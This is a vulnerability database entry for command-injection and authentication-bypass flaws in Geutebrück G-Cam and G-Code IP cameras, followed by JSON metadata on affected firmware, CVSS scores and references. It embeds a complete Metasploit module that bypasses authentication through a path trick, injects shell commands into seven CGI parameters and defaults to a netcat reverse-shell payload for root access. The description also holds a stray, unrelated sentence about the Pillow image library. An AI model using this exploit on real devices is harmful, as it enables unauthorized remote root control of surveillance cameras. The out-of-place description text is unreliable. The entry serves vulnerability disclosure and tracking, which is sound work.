VAR-202109-0597

Vulnerability from variot - Updated: 2025-01-30 21:21

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. The following vulnerabilities exist in G-Cam E2 and G-Code, provided by GEUTEBRUCK:

* Lack of authentication for important features (CWE-306) - CVE-2021-33543
* Command injection (CWE-77) - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* Stack-based buffer overflow (CWE-121) - CVE-2021-33545, CVE-2021-33546, CVE-2021-33547, CVE-2021-33549

The expected impact depends on each vulnerability, but may include the following:

* Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543
* Arbitrary code executed by command injection by a remote third party - CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554
* A remote third party triggers a buffer overflow in the counter parameter and executes arbitrary code - CVE-2021-33545
* A remote third party triggers a buffer overflow in the name parameter and executes arbitrary code - CVE-2021-33546
* A remote third party triggers a buffer overflow in the profile parameter and executes arbitrary code - CVE-2021-33547
* A remote third party triggers a buffer overflow in the action parameter and executes arbitrary code - CVE-2021-33549

Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.

##

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
  update_info(
    info,
    'Name' => 'Geutebruck Multiple Remote Command Execution',
    'Description' => %q{
      This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder
      and exploits multiple authenticated arbitrary command execution vulnerabilities within
      the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,
      EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as
      well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in
      remote code execution as the root user.
    },

    'Author' => [
      'Titouan Lazard', # Of RandoriSec - Discovery
      'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module
      'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module
    ],
    'License' => MSF_LICENSE,
    'References' => [
      ['CVE', '2021-33543'],
      ['CVE', '2021-33544'],
      ['CVE', '2021-33548'],
      ['CVE', '2021-33550'],
      ['CVE', '2021-33551'],
      ['CVE', '2021-33552'],
      ['CVE', '2021-33553'],
      ['CVE', '2021-33554'],
      [ 'URL', 'http://geutebruck.com' ],
      [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
      [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
    ],
    'DisclosureDate' => '2021-07-08',
    'Privileged' => true,
    'Platform' => ['unix', 'linux'],
    'Arch' => [ARCH_CMD],
    'Targets' => [
      [
        'CVE-2021-33544 - certmngr.cgi', {
          'http_method' => 'GET',
          'http_vars' => {
            'action' => 'createselfcert',
            'local' => Rex::Text.rand_text_alphanumeric(10..16),
            'country' => Rex::Text.rand_text_alphanumeric(2),
            'state' => '$(PLACEHOLDER_CMD)',
            'organization' => Rex::Text.rand_text_alphanumeric(10..16),
            'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),
            'commonname' => Rex::Text.rand_text_alphanumeric(10..16),
            'days' => Rex::Text.rand_text_numeric(2..4),
            'type' => Rex::Text.rand_text_numeric(2..4)
          },
          'uri' => '/../uapi-cgi/certmngr.cgi'
        }
      ],
      [
        'CVE-2021-33548 - factory.cgi', {
          'http_method' => 'GET',
          'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },
          'uri' => '/../uapi-cgi/factory.cgi'
        }
      ],
      [
        'CVE-2021-33550 - language.cgi', {
          'http_method' => 'GET',
          'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },
          'uri' => '/../uapi-cgi/language.cgi'
        }
      ],
      [
        'CVE-2021-33551 - oem.cgi', {
          'http_method' => 'GET',
          'http_vars' => {
            'action' => 'set',
            'enable' => 'yes',
            'environment.lang' => '$(PLACEHOLDER_CMD)'
          },
          'uri' => '/../uapi-cgi/oem.cgi'
        }
      ],
      [
        'CVE-2021-33552 - simple_reclistjs.cgi', {
          'http_method' => 'GET',
          'http_vars' => {
            'action' => 'get',
            'timekey' => Rex::Text.rand_text_numeric(2..4),
            'date' => '$(PLACEHOLDER_CMD)'
          },
          'uri' => '/../uapi-cgi/simple_reclistjs.cgi'
        }
      ],
      [
        'CVE-2021-33553 - testcmd.cgi', {
          'http_method' => 'GET',
          'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },
          'uri' => '/../uapi-cgi/testcmd.cgi'
        }
      ],
      [
        'CVE-2021-33554 - tmpapp.cgi', {
          'http_method' => 'GET',
          'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },
          'uri' => '/../uapi-cgi/tmpapp.cgi'
        }
      ]
    ],
    'DefaultTarget' => 0,
    'DefaultOptions' => {
      'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
    },
    'Notes' => {
      'Stability' => ['CRASH_SAFE'],
      'Reliability' => ['REPEATABLE_SESSION'],
      'SideEffects' => ['ARTIFACTS_ON_DISK']
    }
  )
)

end

def firmware
res = send_request_cgi(
  'method' => 'GET',
  'uri' => '/brand.xml'
)
unless res
  print_error('Connection failed!')
  return false
end

unless res&.body && !res.body.empty?
  print_error('Empty body in the response!')
  return false
end

res_xml = res.get_xml_document
if res_xml.at('//firmware').nil?
  print_error('Target did not respond with a XML document containing the "firmware" element!')
  return false
end
raw_text = res_xml.at('//firmware').text
if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
  raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0]
else
  print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!')
  false
end

end

def check
version = firmware
if version == false
  return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')
end

rex_version = Rex::Version.new(version)
vprint_status("Found Geutebruck version #{rex_version}")
if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')
  return CheckCode::Appears
end

CheckCode::Safe

end

def exploit
print_status("#{rhost}:#{rport} - Setting up request...")

method = target['http_method']
if method == 'GET'
  http_method_vars = 'vars_get'
else
  http_method_vars = 'vars_post'
end

http_vars = target['http_vars']
http_vars.each do |(k, v)|
  if v.include? 'PLACEHOLDER_CMD'
    http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded
  end
end

print_status("Sending CMD injection request to #{rhost}:#{rport}")
send_request_cgi(
  {
    'method' => method,
    'uri' => target['uri'],
    http_method_vars => http_vars
  }
)
print_status('Exploit complete, you should get a shell as the root user!')

end
end


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202109-0597",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "g-code een-2010",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ebc-2110",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ebc-2112",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam efd-2250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ewpc-2275",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-code een-2040",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ewpc-2271",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ebc-2111",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ethc-2239",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ethc-2230",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ethc-2249",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-code een-2010",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam efd-2241",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ebc-2110",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-code een-2040",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam ewpc-2271",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam ebc-2111",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam ethc-2239",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam efd-2250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam ethc-2249",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ethc-2230",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ewpc-2270",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-code eec-2400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-code een-2010",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam efd-2241",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ethc-2240",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam efd-2251",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ethc-2230",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam efd-2241",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-code eec-2400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ewpc-2270",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ethc-2249",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-code eec-2400",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam ethc-2240",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam efd-2251",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ewpc-2275",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ebc-2112",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ewpc-2270",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam ewpc-2275",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ebc-2110",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam efd-2250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam efd-2251",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-cam ethc-2240",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.0.27"
      },
      {
        "model": "g-code een-2040",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ebc-2112",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.13.2"
      },
      {
        "model": "g-cam ewpc-2271",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ebc-2111",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "g-cam ethc-2239",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "geutebrueck",
        "version": "1.12.14.5"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "\u2025 * firmware    1.12.13.2    1.12.14.5"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "* een-20xx"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "* efd-22xx"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "* ethc-22xx"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "\u2025 * g-cam"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "* eec-2xx"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "works with the above firmware  s  e2 series camera models   encoders"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": null
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "* ebc-21xx"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "\u2025 * g-code"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "( multiple products )"
      },
      {
        "model": "",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "geutebruck",
        "version": "* ewpc-22xx"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33544"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-33544",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CVE-2021-33544",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.0,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "id": "CVE-2021-33544",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "OTHER",
            "availabilityImpact": "High",
            "baseScore": 7.2,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2021-002023",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2021-33544",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "info@cert.vde.com",
            "id": "CVE-2021-33544",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "OTHER",
            "id": "JVNDB-2021-002023",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202107-2093",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33544"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33544"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-33544"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33544"
      },
      {
        "db": "PACKETSTORM",
        "id": "164036"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-33544",
        "trust": 2.7
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-21-208-03",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "164036",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU97817785",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-21-208-05",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023",
        "trust": 0.8
      },
      {
        "db": "CXSECURITY",
        "id": "WLB-2021090031",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021072807",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2550",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021041363",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975",
        "trust": 0.6
      },
      {
        "db": "OTHER",
        "id": "NONE",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33544",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-33544"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "db": "PACKETSTORM",
        "id": "164036"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33544"
      }
    ]
  },
  "id": "VAR-202109-0597",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "OTHER",
        "id": null
      }
    ],
    "trust": 0.01
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "camera device"
        ],
        "sub_category": "camera",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      }
    ]
  },
  "last_update_date": "2025-01-30T21:21:41.117000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "GEUTEBRUCK\u2019s web portal (Login required)",
        "trust": 0.8,
        "url": "https://portal.geutebrueck.com/"
      },
      {
        "title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158073"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202107-2093"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      },
      {
        "problemtype": "Command injection (CWE-77) [ Other ]",
        "trust": 0.8
      },
      {
        "problemtype": "Stack-based buffer overflow (CWE-121) [ Other ]",
        "trust": 0.8
      },
      {
        "problemtype": "Lack of authentication for important features (CWE-306) [ Other ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-002023"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-33544"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
      },
      {
        "trust": 1.6,
        "url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu97817785/"
      },
      {
        "trust": 0.8,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
      },
      {
        "trust": 0.7,
        "url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/issue/wlb-2021090031"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
      },
      {
        "trust": 0.1,
        "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/"
      },
      {
        "trust": 0.1,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
